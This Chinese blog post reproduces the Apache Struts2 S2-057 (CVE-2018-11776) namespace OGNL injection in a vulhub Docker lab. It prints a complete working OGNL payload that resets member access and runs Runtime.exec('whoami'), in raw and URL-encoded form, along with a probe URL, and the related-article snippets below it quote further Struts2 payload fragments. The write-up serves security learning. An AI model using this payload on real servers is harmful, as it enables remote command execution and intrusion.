【vulhub】structs2远程命令执行 CVE-2018-11776(S2-057)

最新推荐文章于 2023-12-18 09:13:25 发布
最新推荐文章于 2023-12-18 09:13:25 发布
阅读量500 收藏
点赞数
分类专栏: structs2 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121754939
版权

前提

1、alwaysSelectFullNamespace被设置为true,此时namespace的值是从URL中获取的。URL是可控的,所以namespace也是可控的。
2、action元素没有名称空间属性集,或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式,最终导致远程代码执行的脆弱性。

一、启动靶机

docker-compose build

docker-compose up -d

二、构造payload

URL:

http://192.168.150.146:8080/struts2-showcase

在这里插入图片描述

${(123+123)}

命令:whoami

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码后:

%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%77%68%6f%61%6d%69%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d

在这里插入图片描述

三、发送payload

URL:

http://192.168.150.146:8080/struts2-showcase/${(123+123)}/actionChain1.action

在这里插入图片描述
url返回成功计算123+123的值。
在这里插入图片描述

四、检验

在这里插入图片描述

参考:

http://luckyzmj.cn/posts/2aa09a5b.html
Crazy_Yu8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2 代码执行CVE-2018-11776
qq_32445755的博客
03-08 812
影响版本 Struts<= Struts 2.3.34, Struts 2.5.16 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。路径为/struts2-showcase/ ...
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135)
qq_51577576的博客
11-19 713
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码
Apache Struts2高危漏洞(S2-057CVE-2018-11776
weixin_33835103的博客
09-03 229
花了两天时间,特此记录 一:背景: 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞。 二:漏洞产生原理: 1.需要知道对应跳转请求的action名称 2.Struts2框架中的属性设置为: 1) struts.mapper.alwaysSelectFullNamespace = true 2) type...
Struts2中一个远程代码执行漏洞(cve-2018-11776)修复之struts2版本2.1.8.1升级到2.3.35
weixin_35713959的博客
12-13 266
struts2版本2.1.8.1升级到2.3.35 由于是老项目采用的还是jar包直接下载拖上去的方式。 新项目可自行将依赖换成对应的版本。 原版本: 替换后新版本: 具体jar包下载地址可在如下地址中寻找: https://www.mvnjar.com/org.apache.struts/struts2-jasperreports-plugin/2.3.35/detail.html ...
struts2 代码执行CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 4527
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
[Vulfocus解题系列] Struts2-052远程代码执行漏洞(CVE-2017-9805)
00勇士王子的博客
07-14 2212
漏洞介绍 名称: struts2-052 远程代码执行CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞(漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞(CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
E046-服务漏洞利用及加固-利用structs2实现远程命令执行.pdf
12-02
本文将深入探讨一个安全漏洞的利用与加固,特别是如何利用Structs2框架中的漏洞实现远程命令执行。该课程以E046为主题,涵盖了网络安全领域的一个重要问题,即服务漏洞的利用和防御策略。我们将首先了解实验环境,...
structs2拦截器实例2-权限验证拦截器
11-08
在这个“structs2拦截器实例2-权限验证拦截器”的主题中,我们将深入探讨如何使用Struts2拦截器进行权限验证。 首先,拦截器是基于AOP(面向切面编程)的概念实现的,它们可以插入到请求处理流程中,在Action执行前...
learning-solidity-2018:Solidity智能合约的基本示例
02-05
2. **变量**:合约内的变量可以是不同类型,如整数(int)、地址(address)和布尔值(bool)。它们可以是状态变量(存储在区块链上)或本地变量(仅存在于函数内部)。 3. **函数**:合约可以定义多个函数,包括...
墨者Apache Struts2远程代码执行漏洞(S2-015)题解
zr1213159840的博客
01-08 2552
这题在网上搜索后,发现是这么进行操作的 首先在地址后面添加 ${1+2}.action 即访问 http://219.153.49.228:43186/${1+2}.action 发现存在回显 然后我们构造以下信息,访问当前的文件夹,发现key.txt %24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDecla
struts2远程命令执行02
最新发布
m0_71366428的博客
12-18 2067
Struts2是一个基于Java的开源Web应用程序框架,用于开发Java EE网络应用程序。它建立在Apache Struts框架的基础上,提供了更加灵活、可扩展和安全的开发方式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057CVE-2018-11776
qq_51577576的博客
12-10 552
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057CVE-2018-11776) 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
2022-10-02笔记(linux&&kali安装docker&&vulhubs2-001、s2-057、永恒之蓝常用模块)
qq_45751902的博客
10-03 1176
docker exec -it e8f4844aabc1 /bin/bash #进入容器(id:e8f4844aabc1)docker stop 3b41c0c08430 #关闭容器(id唯一标识,建议使用id)#kali中,使用浏览器访问http://IP #IP可为127.0.0.1。docker --help #查看docker命令
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 730
vulhub thinkphp5 5.0.23 远程代码执行漏洞
Apache SSI 远程命令执行漏洞(SSI注入漏洞)复现 _ _使用vulhub搭建环境
net的博客
02-19 299
实验环境:Ubuntu。
lldpd-structs.h在sonic-buildimage的哪个目录下?
05-30
在 Sonic 操作系统中,`lldpd-structs.h` 文件是在 `sonic-mgmt/sonic-buildimage/packages/lldpd/files/usr/include/lldp` 目录下。因此,你需要前往 `sonic-mgmt/sonic-buildimage/packages/lldpd/files/usr/include/lldp` 目录下查找 `lldpd-structs.h` 文件。你可以使用以下命令在 Sonic 操作系统中查找该文件: ``` cd sonic-mgmt/sonic-buildimage/packages/lldpd/files/usr/include/lldp ls lldpd-structs.h ``` 这将列出 `lldpd-structs.h` 文件是否存在于该目录中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值